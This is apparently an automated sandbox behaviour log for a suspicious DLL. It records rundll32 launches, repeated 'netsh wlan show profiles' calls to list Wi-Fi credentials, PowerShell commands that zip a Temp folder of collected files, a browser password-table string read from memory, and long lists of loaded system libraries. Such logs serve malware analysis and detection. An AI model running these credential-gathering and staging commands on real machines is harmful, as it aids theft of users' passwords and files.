    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
    Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\_Files_\LTKMYBSEYZ.docxJump to behavior
    Source: mU3Ob2XcCt.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Main
    Source: rundll32.exe, 00000003.00000002.1957547430.000001EB5A7A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1957191007.0000019A2AFE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2036889929.000001C667138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: mU3Ob2XcCt.dllReversingLabs: Detection: 31%
    Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll"
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Main
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,Save
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Main
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",Save
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1Jump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mU3Ob2XcCt.dll,SaveJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",MainJump to behavior
    Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",SaveJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mU3Ob2XcCt.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
